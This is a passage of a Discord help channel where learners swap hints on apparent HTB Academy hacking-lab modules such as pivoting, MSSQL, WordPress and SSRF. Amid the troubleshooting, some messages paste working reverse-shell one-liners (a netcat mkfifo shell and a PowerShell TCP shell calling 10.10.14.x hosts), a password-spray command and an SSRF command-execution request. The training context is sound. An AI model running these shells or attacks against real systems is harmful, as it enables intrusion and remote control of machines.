However, we get the same website we got when we visit the IP directly, so academy.htb is the same domain we have been testing so far. We can verify that by visiting /blog/index.php, and see that we can access the page.

acoustic owl
ripe grove
#

I understand VHOSTs, but I don't understand the section and what it is trying to say. Is it related to vhosts? It doesn't talk about them at all

acoustic owl
ripe grove
#

when we set the IP to academy.htb in hosts

#

The message "admin panel has moved to academy.htb" was displayed in a previous section

acoustic owl
ripe grove
#

That is the verbage from the section

acoustic owl
analog tendon
#

bro for the fuff just need to add any and all vhost to the /etc/hosts file for the IP. it will save you alot of time

ripe grove
analog tendon
#

ffuf*

ripe grove
#

I'm asking about the DNS Records section

#

I don't understand how they reached the conclusion they did

acoustic owl
thorn urchin
#

Cause it very well could be that their example for what theyre trying to explain is bad, but this test will make it clearer if thats the case or not.

ripe grove
#

yes, I know that. Since WE set the academy.htb to an IP in hosts, then they are identical. Since we set it to be the same, how does that prove that they were always the same? That's what the section seems to say

thorn urchin
#

how I answer your question depends on what kind of result you get back

ripe grove
#

ok, let me test

thorn urchin
#

they may just be using a shitty example and if they are then my explanation wont make any sense

opal jewel
#

Anyone available to ask a question regarding Attacking Services - Hard Lab. Just completed but quite confused on a step as to why it works. Let me know

analog tendon
opal jewel
#

I am confused as to why the attack chain works when initial key element returns a value of 0 @analog tendon

ripe grove
thorn urchin
#

the idea is that the server can be configured to serve a specified vhost, and it may serve a default one with just the IP address, but redirect to the proper stuff depending on which vhost it receives from a browser.

#

but in this case, the academy domain and the default page are the same, so you see no difference

analog tendon
ripe grove
#

I dont even think they are touching on vhosts yet. It's a couple of sections ahead. It seems like they are saying "we just proved academy.htb is the same as our test IP". The previous sections the php page had a message that the admin panel moved to academy.htb

thorn urchin
silk glade
#

Hello, Need help on FILE TRANSFER module. I created webdav server and can see that on local pc. But when connecting from powershell with dir \192.168.0.119\DavWWWRoot it says path not exist. Can anyone help?

thorn urchin
#

@ripe grove basically just ignore it and move on

ripe grove
thorn urchin
#

yeah the point they were trying to make isnt relevant for the lab

#

pretend that if you accessed the IP directly you got the apache default page and you didnt get the site until you added academy to etc/hosts

ripe grove
#

well that's the vhost section

#

well thanks all for confirming I wasn't crazy. I was very confused for a moment

rustic sage
#

could someone help me on file uploads - type transfer? I've got files uploaded but it's treated as an image not a webshell ||I was using one of the jpg MIME types and fuzzed for acceptable extensions, but haven't gotten anything to work||

opal jewel
#

I spent majority of time elsewhere because the value was 0. Eventually gave it a try and got the flagkek

rustic sage
analog tendon
# opal jewel Yes

i may not be understanding it right but i put it in the same place as being a domain admin but within the database. as long as you can run as admin within the domain you can run files on other machines within the domain and since they're linked then its like they are their own domain. the thing that killed me on that one was the syntax. they didnt explain it too well and i had to look elsewhere to figure out how to put the syntax properly

hasty solar
#

u can dm if u want I have completed that module

opal jewel
#

That threw me off

analog tendon
opal jewel
#

service I could access

#

It does not work w/o attempting to impersonate said user

analog tendon
#

thats because he wasnt an admin the server you could access. but if you were to bounce that same command after impersonating off the linked server he would have a value of 1

#

sorry run the command of the linked server. not bounced

opal jewel
#

I understood that as, I have to impersonate as that user from server I am on before going to linked server

analog tendon
#

i think on local server you were just supposed to see that you can impersonate J but then if you checked to see if J was a DBA on local it would be 0 but he was DBA on linked

opal jewel
#

I was expecting ```--------
user

(1 rows affected)


    ---->0 to be 1 ``` and I also checked it if he was sysadmin, never dbo.
#

Although, did see dbo by checking current user on linked server

analog tendon
#

oh well they were making it hard and confusing to just make it hard and confusing.

opal jewel
#

Yeah, after answering that question, who you can impersonate I did just that and saw 0

tough needle
#

Hi guys, is this the correct channel regarding help with Starting Point labs?

opal jewel
#

and immediately scratched my head and started other attack vectors

analog tendon
tough needle
#

thanks!

analog tendon
opal jewel
#

That last question lost me for good 4-5 hours lol

#

I went back to the beginning and re-enumerated everything

opal jewel
#

I could not connect to db with sqsh to save my life

#

1 user needed a password change and user f*** was an incorrect password ๐Ÿคทโ€โ™‚๏ธ

#

mssqclient worked just fine

#

Ill probably try to get a reverse shell instead of just reading flag another day

fathom pendant
#

Sqsh is broken on pwnbox/parrot

opal jewel
#

i use it on ubuntu

#

which was broken

fathom pendant
#

Oh

#

Then idk xD

opal jewel
#

These modules have taught me 1 important lesson so far and that is Try multiple versions of the same exact tool, using exact same syntax

fathom pendant
#

Yeah

#

Like some things needing python 2.7 not 3

opal jewel
#

Evil-winrm/cme/impacket

#

Those are 3 Ive had issues with so far relating to versions

#

Since im on ubuntu I tend to keep my newer versions in /snap/ instead of /usr/bin

digital pewter
#

Did anyone else see an experimental interactive terminal pop up in academy? I checked it out...pretty freakin' cool! Way to go dev team!

digital pewter
# acoustic owl Do you mean the PwnBox?

Yeah, it pops up when you start the pwnbox. I typically don't use the pwnbox and hadn't in a while, so I was a little surprised to see the addition of the integrated terminal. Its quite possible it isn't new but just new to me. Still, color me impressed. ๐Ÿ™‚

narrow jungle
#

can someone point me in the right direction i'm in the nmap module on the final lab, i've searched and found 2 ports open 22 and 80

#

but i'm unsure on how to proceed

fathom pendant
#

Try scanning all ports

narrow jungle
#

i did

#

-p-

fathom pendant
#

Also try -sU

supple patio
#

try out the nc

#

of the specific port

#

80 mb

narrow jungle
#

i tried nc on both ports 22 and 80

supple patio
#

oh

#

ok

narrow jungle
#

waited for a while

supple patio
#

try out curl /robots.txt

supple patio
narrow jungle
#

port 20 just spat out SSH version

#

port 80 just spat out what curl would about the webpage/server

#

no flag

narrow jungle
fathom pendant
supple patio
#

wait

#

try out the --source-port 53 when scanning with nmap

fathom pendant
#

--source-port

steady hawk
#

The question is asking the version of the service. The -sV flag does just that

supple patio
#

from shell

fathom pendant
#

It's expecting something: but they're not finding the right port

supple patio
analog tendon
#

i think the version is the flag if i remember right

supple patio
fathom pendant
#

But also this lab specifically, is where the firewall evasion techniques come into play

narrow jungle
#

using --source-port 53 in a new nmap scan

#

i've been on it so long the vm ran out of time and died lol

fathom pendant
#

This is why it's recommended to run it on your own vm

supple patio
narrow jungle
#

these mfs

#

hahah

#

port 50000

supple patio
#

yeah

#

you just needed to add the source port

#

xd

narrow jungle
#

i realised i was missing the source port because its specified that its used to basically trick the firewall or IDS/IPS

supple patio
#

would you like to become accountability buddies?

narrow jungle
#

thanks for the help peeps

#

yeh man

narrow jungle
dull thunder
#

anyone available and willing to help with the "attacking common services - DNS" ?

narrow jungle
#

just added sudo and the correct port now i know it and got the flag

dull thunder
#

ok

#

ive ran that and got a whole bunch of subdomains using "dig any"

#

and no flag to speak of

#

i dont get it

steady hawk
#

iirc that's the wrong wordlist

#

i think it was ||fierce||

fathom pendant
#

the wordlist thing is a different module entirely

steady hawk
fathom pendant
#

it's an earlier module

dull thunder
#

ok i could try that

#

or maybe it was using the tool fierce?

#

but the says use subbrute so

thorn urchin
#

dont need the tool

#

can just jack its word list

dull thunder
#

ahhh ok

ashen wolf
#

pivoting module / skills assesment section
how you transfer files to/from ||172.16.5.35|| host. Files I want to transfer are too big to use base64 trick. It is impossible on my first pivot to setup any http server for the transfer. I tried port forwarding so ||172.16.5.35|| can reach my attack box through my pivot machine, but it doesnt work (used msfconsole portfwd maybe i should try chisel). scp doesnt work either. any ideas?

opal jewel
fathom pendant
#

with xfreerdp you can mount a directory from your system to the rdp system; check the man page for xfreerdp to see the syntax

dull thunder
opal jewel
#

Honestly, double check your ports etc

dull thunder
raven cairn
#

can i have a nudge on passwords attack medium

#

Like I am confused where to start

#

I see SSH and SMB open on the box -- like do they want me to bruteforce again?

rustic sage
#

if you need more help feel free to dm me

wind pebble
#

hey all. Dumb question but I was doing the Linux Fundamental module, Section Network Services. I figured out the type of services by ||runing cat on syslog.service||. I was wondering if you can look up this info with a systemctl command or such?

fathom pendant
rustic sage
#

Hi, im tring hack a machine but in my company there are a firewall and it is blocking mi conexion, somebody know how i can bypass it?

acoustic owl
rustic sage
#

okay

winged roost
#

ok again this is for Module related stuff,anyone withn an ounce of common sense will not illegally hack for you... go to the police and report it.

civic fiber
#

Hello is this group for helping with academy lab?

winged roost
civic fiber
#

I struggle with INFORMATION GATHERING - WEB EDITION part Active Subdomain Enumeration

#

Question : Find and submit the contents of the TXT record as the answer.

#

Should I do footprinting from the start as recommended?

winged roost
#

Brill.... may i suggest you then find a channel willing to help you. Because this isnt the place, it is for module related stuff.

winged roost
fathom pendant
tribal linden
#

Can any one give me a hint on Attacking Common Services, Attacking SQL Databases? I have the users password but cant log in with it. I have tried all of the other suggested attacks in the module; not sure what to do next?

fathom pendant
#

MSSQL iirc

quasi moth
#

Hello, can somebody help ke wirh weh attacks skills assessment module, I get what admin username is, but don't know how tk change his password, it says to me Access Denied. I was trying HTTP verb tampering and to change uid, propably problem in token, but I can't decipher it. Could someone DM me for help? Thanks in advance

tribal linden
worthy relic
#

does any one have microsoft 365 license key

fathom pendant
#

This isn't the place to ask for that, also as O365 is a sub based service-based on account someone just having a key is just silly. Especially if you get that key, they'll still be able to tamper with your account

#

Any "key" is going to be a cracked key and illegal :)

worthy relic
#

oh thnkx for the info

winged roost
#

Question for ** Windows Priv Esc PILLAGING** - Restore the directory containing the files needed to obtain the password hashes for local users. Submit the Administrator hash as the answer. - Could someone point me in the right direction, Im running user Jeff as admin and still access denied with get the backup.

digital pewter
# ashen wolf **pivoting module / skills assesment section** how you transfer files to/from ||...

You can copy and paste files within an RDP session using both mstsc and xfreerdp. That's probably the easiest option, though I strongly recommend getting familiar with other terminal-based file transfer methods. If you haven't already, you should definitely check out the File Transfers module - its very well done:
https://academy.hackthebox.com/course/preview/file-transfers

tiny ledge
#

I'm doing the Hacking Wordpress skills assessment, but my API keys from the DB are not working, thus can't find more info about the vulnerable plugin. I know what the plugin is, but not sure which exploit to use, can someone confirm if it's the same one from the instruction's example : wp_admin_shell_upload

tribal linden
#

the api key from wpscan?

crude drift
#

hm

tiny ledge
tribal linden
#

what flag are you using in wpscan to declare the key?

tiny ledge
#

--api-token

rustic sage
#

Be sure to ||turn off the AV||.

teal anvil
#

Hello,

module getting started, knowledge check page.

I want to ||upload a shell, how do you make flash work?||

Thank you.

autumn pilot
#

define "flash work"

teal anvil
autumn pilot
#

are you sure that this is the correct way?

teal anvil
#

<object id="SWFUpload_0" type="application/x-shockwave-flash" data="template/js/uploadify/uploadify.swf?preventswfcaching=1678962077688" class="swfupload flpl_initiated" style="position: absolute; z-index: 1;" width="100%" height="25"></object>

I am sure it is A correct way.

Source: https://attackdefense.com/challengedetailsnoauth?cid=14

autumn pilot
#

look at the hint and think about your approach

teal anvil
ashen wolf
#

Because windows host is connected to the first Linux machine I setup on my first pivot
portfwd add -R -l 80 -p 80 -L <IPaddressofAttackBox>

Of course I didn't forget to run autoroute and socks in msf.

With the port redirection I should be able to download files on windows from my attack box wget http://PIVOT_IP_ADDR/script
I understand this should connect to Linux machine on port 80, some magic will be done and ultimately my own host will receive GET request. But it doesnt

tiny ledge
#

Hmm, really stuck on the question: 'Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.' in 'Hacking WORDPRESS' -- Can someone give me a hint, whether I need to use metasploit somehow, or can I somehow get the answer from the vulnerability I found containing word: ajax

#

I can open the file /etc/passwd, but that does not seem to help me at all

acoustic owl
#

Look at all installed plugins and search with the search engine of your choice for <plugin name> and unauthenticated file download.

tiny ledge
sage granite
#

Copy and paste never focking work in browsers pwnbox

autumn pilot
#

you can use the copy-paste box that is integrated into pwnbox

sage granite
#

Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.

How am I supposed to do this? Aint regexes and tens of pipes a bit too hard for an easy module? Tbh, I hate to manually write things like that for free, it takes a lot of time and debugging and I will still forget it tomorrow

autumn pilot
#

you can literally use the commands from the examples

#

plus the ones from the cheatsheet

sage granite
#

What example command? I have only one usage of curl on that page and its in the question

pliant flame
#

Hi everyone
AD Enumeration Skill Assessment Part 2
Im trying to locate the configuration file containing the MSSQL String

i accessed the Department Share (via smbclient) with the User A... But every folder is empty.

i then tried to spider the complete 172.16.7.3 with
crackmapexec smb 172.16.7.3 -u A***** -p ***** -M spider_plus -o READ_ONLY=False

but the spider_plus doesnt finish. i always get a timeout error.

can anyone give me a hint, if im on the right track with the smb share and with the syntax of the spider

ty

sage granite
autumn pilot
#

if are not willing to remember tools then you should reconsider your skill/job path

#

as it is a crucial thing

sage granite
#

You can ask about it guys like team leaders in google security, I can give you dc to some, they won't remember this shit too

autumn pilot
#

if only you spent that energy into trying by yourself rather than complaining, you should have finished the exercise

sage granite
#

I can't think anymore when i'm angry and frustrated, now I can only complain

autumn pilot
#

find the solution to that problem

#

don't paste such stuff, check for white spaces or reach out to support

sly reef
#

Hey guys, broken auth assesment here,

Anyone knows a wordlist for roles? I've been trying to get it for a day now.

Got user enum, got em cracked with rockyou and cracked the cookie.

rustic sage
#

I'm stuck in the pivot skill assessement. Enumerate the internal network and discover another active host. Submit the IP address of that host as the answer. I found credentials for ||mlefay|| but i'm not able to login anywhere. I also tried to ping sweep on the webshell via for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done but i keep getting ping: 172.16.5.{1..254}: Name or service not known. Could use some help.

ashen wolf
#

Alternatively u can run through proxy Nmap and scan entire network for ssh & rdp. But it will take forerver

rustic sage
sage granite
#
$ curl -s https://www.inlanefreight.com | grep  -oiE "www.inlanefreight.com/*[^'\"\ \?\\t\%]+/" | sort -u 
www.inlanefreight.com/index.php/
www.inlanefreight.com/index.php/career/
www.inlanefreight.com/index.php/feed/
www.inlanefreight.com/index.php/news/
www.inlanefreight.com/index.php/offices/
www.inlanefreight.com/index.php/wp-json/
www.inlanefreight.com/index.php/wp-json/oembed/1.0/
www.inlanefreight.com/index.php/wp-json/wp/v2/pages/
www.inlanefreight.com/wp-includes/
www.inlanefreight.com/wp-includes/css/
www.inlanefreight.com/wp-includes/js/
www.inlanefreight.com/wp-includes/js/jquery/

Still wrong answer though, things like that are often a lot harder than it looks, cause you have to kinda guess what the creator considers as a valid path, or what can slip under your filter, certainly it shouldn't be rated ez imo, there are security ppl who don't know linux or terminals at all or just starting.

rustic sage
#

No worries, glad to help. Have you done the pivot skill assessment already by any chance?

naive sky
#

๐Ÿ˜ข

#

any help please for skill assesment sqlmap essentiaals i got the exact compelete flag but said incorrect

#

๐Ÿ˜ฆ

#

no miss space its clearly same

merry stream
#

Please help on Linux privesc skills assessment in getting the flag1.txt i see the history of htb-student but the flag1 is absent in /var/www/html. What am I doing wrong? thanks in advance

quick cairn
#

Could i DM someone about Attacking Common Services - Attacking DNS? I'm stuck and idk what else to do :/

naive sky
warm kernel
#

anyone able to give me a hint for protected files question in the module password attacks? SSH brute force is taking forever...

slow flame
#

Hello guys. I'm struggling to get the final awnser from Credential Hunting in Windows. The hint is talking about Ansible... Can anyone give me some tips? ๐Ÿ™‚

slow flame
naive sky
#

i dont why

#

sqlmap essentialss

#

really sucks

verbal galleon
#

Nah man itโ€™s cool!

rustic sage
#

I think SQLMap has been one of my favorite modules. I learned a ton of new features/options I didnโ€™t know existed

opal jewel
#

It may not be needed but doesnt hurt

rustic sage
#

Hello can i ask question regarding Attacking common services hard?
I found that there is one smbshares that i can access but when I try the smbmap it gives me authentication error..

#

nvm

#

figured out

rustic sage
rustic sage
#

ty

turbid tartan
#

socks5 tunneling wth chisel: I cant execute chisel on pivot host because some libaries are missing how do i fix that

rustic sage
#

That module is an absolute mess.

turbid tartan
#

@rustic sage yeah that worked thanks! Saved me a lot of time

rustic sage
#

can anyone help me with Attacking common service hard? I will dm for specific question

rustic sage
rustic sage
rustic sage
rustic sage
robust mortar
#

can someone help me with the footprinting module footprinting lab -medium: Enumerate the server carefully and find the username "HTB" and its password. I think I found the MSSQL Password but when I enter it I get an error saying that it could not connect

ancient spire
#

Anyone else having issues RDP'ing into the Windows machine on the 'Introduction to Active Directory' module for the 'Guided Lab' sections at the end? I can RDP into the Windows machines in the 'Windows Fundamentals' module just fine. When I do the former, an xfreerdp window appears but it remains blank and then the connection closes with error message of 'ERRINFO_LOGOFF_BY_USER'

warm kernel
#

anyone here finish the medium lab for password attacks? Need a nudge

rustic sage
#

coudl someone help me with file upload skill assessment? I know what I have to do, but I'm struggling to achieve it

rustic sage
steady hawk
low abyss
#

Anyone want a study partner for Academy with goal of getting CPTS?

rotund urchin
#

I am working on the Nibbles practice box and I have a question about the reverse shell used in the course to gain root. I cant find much information or where the shell came from, but why is this one used: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 8443 >/tmp/f

#

feel free to DM if someone can help me understand ๐Ÿ™‚

elfin loom
#

I feel so dumb... Im on windows fundamentals cause I want to do all modules, but idk what I need to put as version in second task on page 1... I got version with PS with Get-WmiObject, from registry key ProductType, from system info, full name, shortcut, number, all bad. this question: Which Windows NT version is installed on the workstation? (i.e. Windows X - case sensitive) whats a format of an answer for the validator?

thorn urchin
#

well, I havnt done it there but the question says it. Windows X and its case sensitive

elfin loom
#

I tried all cobinations already ๐Ÿ˜„ It drives me nuts ๐Ÿ˜„

thorn urchin
#

why would you try all combinations and not the correct one

#

take care of spaces n such too

elfin loom
#

cause correct one is validated as wrong ๐Ÿ˜ญ I'll come back to it, thanks

thorn urchin
#

It almost most certainly isnt

elfin loom
#

lmao, facepalm, I am dumb, lol

#

I thought it wants a whole name

#

thanks

thorn urchin
#

not module/academy relevant

iron basin
#

Fair enough

rustic sage
#

I can give you a nudge, but I don't remember what wordlists I used

thorn urchin
#

generally for that module you use either the mutated list, the unmutated list, and rockyou

rustic sage
#

^^

sly tapir
#

Ok ! Ill try the rockyou.

rustic sage
#

could I DM someone about file upload skill assessment? ||my shell is uploading, but I still get a 404 when navigating||

dim temple
#

Can i have a sanity check for "HTTP Response Splitting" in module: "HTTP ATTACKS " ? In particular about 'admin report' functionality, it doesn't work even with basic redirection

mortal basin
warm kernel
#

have you tried cyberchef or burpsuite?

#

copy the url to cyberchef and choose the settings for it

#

at least im 99% sure cyberchef does url decoding, quick google search will give you the results

#

sure

obsidian agate
#

Hello, I'm having an issue with the in browser instance and getting to the target. I've tried googling, and looking through some of the support post. Sorry if this is the wrong place to ask, I started yesterday. Can someone point me in the right direction?

low abyss
obsidian agate
feral drum
#

hey does anyone know how to install proxychains or anon surf on kali for some reason i dont know why it is not working used it a million times and now all the sudden it is not working

acoustic owl
raven cairn
#

I want to flex all the modules ive done ๐Ÿฅฒ

#

Like it would be cool to show completed academy stuff on main HTB platform

fathom pendant
slow flame
fathom pendant
#

Everything you need should be in the module iirc

slow flame
digital pewter
fathom pendant
silk void
#

I can't understand what a personal machine instance is, can someone explain it to me?

digital pewter
# silk void I can't understand what a personal machine instance is, can someone explain it t...

Hard to say without the exact context. They are probably referring to a machine instance that is provided only for you (no other HTB users are sharing the instance so you won't have to contend with anyone else while attacking the machine, come across files/exploits they have left around, or deal with changes they've made to the box while exploiting it). Its also possible that they are referring to your own Attackbox rather than the Pwnbox. For instance, if you use VirtualBox with a Kali/Parrot VM, or VMware with a Kali/Parrot VM, etc.

fiery ivy
#

Can anyone help me out, I'm having difficulty finding the targets hostname while doing an NMAP scan

fiery ivy
#

Module 19, I'm looking everywhere for a NMAP command that will specify a targets hostname

barren robin
fiery ivy
#

Enumerate the hostname of your target and submit it as the answer.

#

this is what it's wanting me to do

barren robin
#

What is the command you are running?

fiery ivy
#

I'm trying a few things

#

I'm running -A now

#

Performs OS Detection, Service Detection, and traceroute scans.

#

๐Ÿคทโ€โ™‚๏ธ

barren robin
#

Is this the Network Enumeration with Nmap module?

fiery ivy
#

holy shit I found it

#

nmap -A did the trick

#

thanks for the help though for sure

barren robin
#

Np, did you try -sV -sC or -O before that?

naive sky
#

**#command injection

  • 1 Review the HTML source code of the page to find where the front-end input validation is happening. On which line number is it?

the answer is : 25 why its wrong?**

fathom pendant
#

Because the first bits of lines aren't the html code

naive sky
#

how could i do for that ?

fathom pendant
#

Look where the "<!--Doctype" starts or for <html>

#

You do have the code but the first 21ish lines looks like that's just your proxy request

naive sky
#

****i havent seen result
#Command injection

  • 1 Use what you learned in this section to execute the command 'ls -la'. What is the size of the 'index.php' file?

torn grail
#

what's up hackers

elfin nacelle
#

Module: Server Side Attacks Section: SSRF Exploitation Example

iron rune
#

if you can run commands maybe try for a reverse shell?

elfin nacelle
#

When I encode the characters for the command, I get the following message:

#

"URL can't contain control characters."

iron rune
#

what are you using to repeat burp?

fathom pendant
#

Try something like ....// For directory traversal

elfin nacelle
#

Yes. I was using burp even though there wasn't mention of it for this section of the module. The question, "Replicate what you learned in this section to gain code execution on the spawned target, then look for the flag in the root directory and submit the contents as your answer." recommended to use the rce script. That script also returns the following error when I attempt:

#

"bash: syntax error near unexpected token `>'"

waxen kayak
#

I think I am doing something wrong.

In the Password Mutations section of password attacks module. I am trying to use hydra to bruteforce the ssh creds. For the life of me I can't get hydra to work. Any thoughts? I've tried explicitly specifying the username, and then trying a username.list file, nothing seems to stick.

#

argh... disregard.. using the -p instead of -P for password list :S

#

leaving it for anyone who falls into the same trap.

worldly solar
#

Question about basics. I'm doing the "getting started" module. In the questions it states that you spawn the target. Goal is to do a NMAP scan on the the target. So do I scan the VM I spawned or is there a target in the VM network i should scan.
So scan the local machine or scan some other IP that I should locate?
Bit confused because on previous question the version of VM's SSH banner was newer than the answer of the question.

zenith jay
#

Working on the Secure Coding 101: Javascript module and stuck on #4 in the assessment (/Reverse). Anybody have tips/tricks or help they can give? I have it unpacked and think I understand several of the pieces (the array, the inverted b64, the URL decoder). Just a bit lost on figuring out what to change. Been going at it for days now

zenith jay
elfin nacelle
#

Module: Server Side Attacks
Section: SSRF Exploitation Example

I cannot locate the flag within the files rendered:

curl -i -s "http://10.129.189.132/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=ls%252520-lha%25250A%250A "
HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 407
Server: Werkzeug/2.0.2 Python/3.8.12
Date: Fri, 17 Mar 2023 05:12:01 GMT

<html><body><h1>Resource: http://127.0.0.1:5000/runme?x=ls -lha
</h1><a>total 24K
drwxr-xr-x 1 root root 4.0K Nov 1 2021 .
drwxr-xr-x 1 root root 4.0K Nov 1 2021 ..
-rw-r--r-- 1 root root 84 Oct 28 2021 index.html
-rw-r--r-- 1 root root 1.2K Oct 28 2021 internal.py
-rw-r--r-- 1 root root 655 Oct 28 2021 internal_local.py
-rwxr-xr-x 1 root root 69 Oct 28 2021 start.sh

Theres no flag in the above. Can someone dm me please?

velvet wyvern
#

I'm having issues with the following module: Getting Started, and section Pentesting Basics (Public Exploits). I have tried nmap, wpscan, gobuster, searchsploited every installed wordpress plugin and even tried to run some of the found xmlrpc exploits with no luck. Can someone point me in the right direction and NOT provide the answer?

autumn pilot
#

Search for plugin exploits

velvet wyvern
#

I already did. Found the following: xmlrpc and wp-cron,

#

Tried about all of the associated exploits related to xmlrpc and wp-cron with no luck

velvet wyvern
#

I forgot to mention simple backup for wordpress

autumn pilot
#

you are half way there

velvet wyvern
#

pwned it

#

god damn simple backup plugin

#

damn it feels good

crimson walrus
#

for Password attacks: attacking ad and ntds.dit
I am not able to get crackmapexec to work. I am using the following command and I get NO output as if the command is not even running. It also doesnt work with rockyou. And updating crackmapexec did not work. Pls send help

crackmapexec smb 10.129.202.85 -u jmarston -p /usr/share/wordlists/rockyou.txt

autumn pilot
#

--local-auth maybe?

crimson walrus
#

will try, thanks

autumn pilot
#

on top of that make sure that your wordlist is not compressed, e.g. rockyou.txt.tgz

slow flame
calm locust
#

how do i hack blox fruits

silver veldt
#

i must be missing something....What is the name of the security regulation for credit card payments a company must adhere to...... I thought it was PCI or PCI DSS but it says I'm wrong.....what am I overlooking?

#

never mind...i needed the"-" in the answer

silver mesa
#

Hi, Need some hints
Module : Footprinting
Section: SMTP
Ques: Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.

I'm using HTB client for this question, I have the footpriniting-wordlist.txt

smtp-user-enum -M VRFY -U footprinting-wordlist.txt -t 10.129.191.181 v
Getting all 101 payload noresult

msfconsole - I tried auxiliary(scanner/smtp/smtp_enum - No result

acoustic owl
livid zephyr
river skiff
silver mesa
silver mesa
silver mesa
cinder mortar
#

personally i used this

#

worked really well

silver mesa
#

Thanks, I will try again

cinder mortar
#

or metasploit scanner/smtp/smtp_enum scanner

#

idk why but smtp-enum didnt work that well for me

turbid tartan
#

pivoting tunneling. Skills Asessment. I know the ||dns(probably DC)|| but how do i reach it?

acoustic owl
robust mortar
#

@livid zephyr yes, I did you can dm if you're still stuck ๐Ÿ™‚

opal echo
#

In SQLMAP essentials I cant find the right place to hit. Anyone able to point me in the right direction.

rustic sage
summer basin
#

coucou

torn blade
#

im doing HTB wordpress skill assessment, for some reason when i try wpscan it says it cant scan the website because it seems like the website is not using wordpress ?????? how fix

#

like ik it has wordpress on it, idkwhy the scan just isnt working

quick cairn
#

Hey I need help for Attacking Common Services > Attacking Email Services I have found m** user but I am struggling with logging in as I am unable to login to all three services. Any help?

winter wraith
#

Stuck on these for a while now Need help on,

Attacking common applications SA 1 - last question.
Found vulnerability but not able to exploit it.

Attacking common applications SA 2 - last question.
Got proper shell but couldn't find flag.

craggy burrow
#

Hello there, have some troubles with the ATTACKING ENTERPRISE NETWORKS module

#

at Exploitation & Privilege Escalation... can get revershell, doing all the steps but can't get it... maybe some help around here?

midnight jetty
#

why i can t google shell inside of a pwnbox

#

i cant google anything

iron rune
#

you probably have to adjust your vpn settings

dusty timber
#

Remember you have to re-download the vpn file if you change connection settings on host

quaint notch
#

Hello, I have a problem with the Meterpreter Tunneling & Port Forwarding module. In the Configuring MSF's SOCKS Proxy section, I try to do the same, but when I execute it, the following message appears. I have tried several times following the previous configurations, but I don't know what I could be doing wrong.

daring gust
lost pecan
livid bluff
#

Hey
I had this problem several times today.
I've had to reboot a new machine 10 times now and I can't get an RDP connection.
Others have had this problem?

#

No problem with remmina.

dusk cloak
#

Hey
I am stuck with the firewall and IDS/IPS evasion - easy lab. Can someone help me with it. U can DM me

ionic sandal
thorn urchin
#

cant even read #rules or #welcome who in their right mind would wanna join such a team.

echo roost
#

anyone have issues with the powershell oneliner - powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

ionic sandal
#

Hey i am a beginner and trying to make a team for future CTF's

thorn urchin
echo roost
#

av is off - I just get PS errors

ionic sandal
#

where can i post the link to get members please tell me

thorn urchin
balmy radish
ionic sandal
#

Its my first time using a discord so i don't know a lot

echo roost
#

nm it was a typo

#

@ionic sandal wrong channel

rustic sage
#

Hey Guys!! I need please some help with Skill Assessment - Broken Authentication , I am stuck for 2 days .. ๐Ÿค•

narrow ravine
#

hey guys i hope everyone is doing well, i just wanted to ask if cubes expire if i get them from a subscription

narrow ravine
#

aight bet

#

ty

worn forge
#

Hey, need help on AD Enumeration & Attacks - Skills Assessment Part II im on the question 7:

Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.

i found the creds nb:D_**_*****, but dont know how to login to the host. anyone here to give a hint or nudge, i tried to use mssql but i couldn't log in

normal brook
#

Can someone help me with 2 questions from the "intro to networking" module? It's asking me to split the network 10.200.20.0/27 into 4 subnets and submit the network address of the 3rd subnet as the answer. I put in 10.200.20.63 and got the answer wrong. The next question is the same thing except i need to submit the broadcast address of the 2nd subnet

hazy grotto
#

HTB Attacking common application osTicket

I'm not sure what Im supposed to do here. anyone want to give me a hint? I tried the users they gvae in the example but they werent working

tall tide
#

Hey everyone, I've been stuck on the Print Operators section of the Windows Privilege Escalation module and was wondering if anyone was willing to point me in the right direction. I'm currently trying to bypass UAC to get an elevated console and be able to see if a user has the SeLoadDriverPrivilege privilege. The bottom of the module said that there are tools in c:\tools\ but I don't see anything that could help with that. I also started to mess with trying to compile UACMe but that's a whole mess trying to do on a Linux VM. I feel like I'm overlooking something.

thorny wadi
#

Hello all! Someone to help me with what im doing wrong is my payload in Code Injection - Skill Assess ?

#

with my*

eager trout
#

?

thorny wadi
red current
#

I'm having some issue with the easy lab in Password Attacks. I can't seem to get in using either open service. I've tried the hints provided here and in the forum. Nothing has worked so far. I've tried using ncrack, crackmapexec, and hydra and they never find anything or just take way too long to complete.

rustic sage
#

hello i am trying to scan for subdomains of subdomains using vhost methodology however it does not find even ones i know for sure are valid. Any idea why

ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt:FUZZ -w enumddomains:FUZZ2-u http://inlanefreight.local -H 'Host: FUZZ.FUZZ2.inlanefreight.local' -t 1300 -timeout 100 > subdomain-scan-full2

raven cairn
#
#

I did it!

fathom pendant
#

Yoooo

raven cairn
#

I don't think this module is as bad as some peeople made it out to be

fathom pendant
#

Welcome to the club

#

People are just impatient

#

Like overall it took a few tweaks to fine tune

raven cairn
#

there were like 2 sections that were kinda bad

#

but the rest of the module was really good

#

The skills assessments were a blast

rustic sage
#

anyone available for File Uploads - Skill Assessment? I'd prefer to DM to avoid spoilers. I'm on the last part of the skill assessment and don't know why something isn't working๐Ÿค”

ashen zodiac
#

What modules do you recommend learning to help me with reversing category for HTB CTF? Im new to HTB Academy as well

balmy radish
#

I donโ€™t think Academy gets in to reversing. The buffer overflow modules could help with the pwn category.

#

The assembly module would be another good one that would also help with reversing

modern epoch
ashen zodiac
#

